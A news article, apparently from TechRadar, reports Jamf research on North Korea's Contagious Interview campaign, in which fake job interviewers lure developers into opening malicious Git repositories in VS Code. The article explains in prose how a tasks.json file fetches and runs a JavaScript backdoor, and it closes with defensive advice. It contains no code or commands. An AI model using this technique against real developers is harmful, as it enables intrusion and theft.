- The Lazarus group’s Contagious Interview campaign exploits Visual Studio Code via malicious Git repositories
- Attackers deliver JavaScript payloads on macOS that enable persistent data collection and C2 communication
- Jamf urges you to enable advanced threat controls and caution against untrusted repositories
As part of the infamous Contagious Interview campaign, North Korean threat actors were seen misusing legitimate Microsoft Visual Studio Code in their attacks.
Contagious Interview is a hacking campaign in which the Lazarus group (and other state-sponsored North Korean actors) create fake jobs and invite software and blockchain developers in Western countries for interviews.
During the interview process, they trick the victims into deploying malware on their devices, giving the attackers unmitigated access to their computers as well as their current employers’ networks.
How to stay safe
The campaign is also quite successful as it is blamed for some of the biggest crypto thefts in recent years.
In a new report, security researchers from Jamf describe “an evolution in the techniques used in earlier phases of the campaign.” They said the attackers would first create a malicious Git repository and host it on platforms like GitHub or GitLab.
Then, during the “interview” process, they would trick the victim into cloning and opening the repository using Microsoft Visual Studio Code. The tool would ask the victim to trust the repository author, and if it does, the app automatically processes the tasks.json configuration file that triggers embedded arbitrary commands.
On macOS, these commands use a background shell to externally fetch a JavaScript payload (often from a platform like Vercel) and pass it to the Node.js runtime.
The JavaScript payload is then executed and establishes a persistent loop that harvests host information (hostname, MAC addresses, and OS details) and communicates with a remote command-and-control server (C2). Finally, the backdoor periodically pings the C2 server, sending system data and receiving additional malicious JavaScript instructions.
“We strongly recommend that customers ensure that Threat Prevention and Advanced Threat Control are enabled and set to blocking mode in Jamf for Mac to remain protected against the techniques described in this investigation,” Jamf warned.
“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unknown sources. Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents,” they added.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
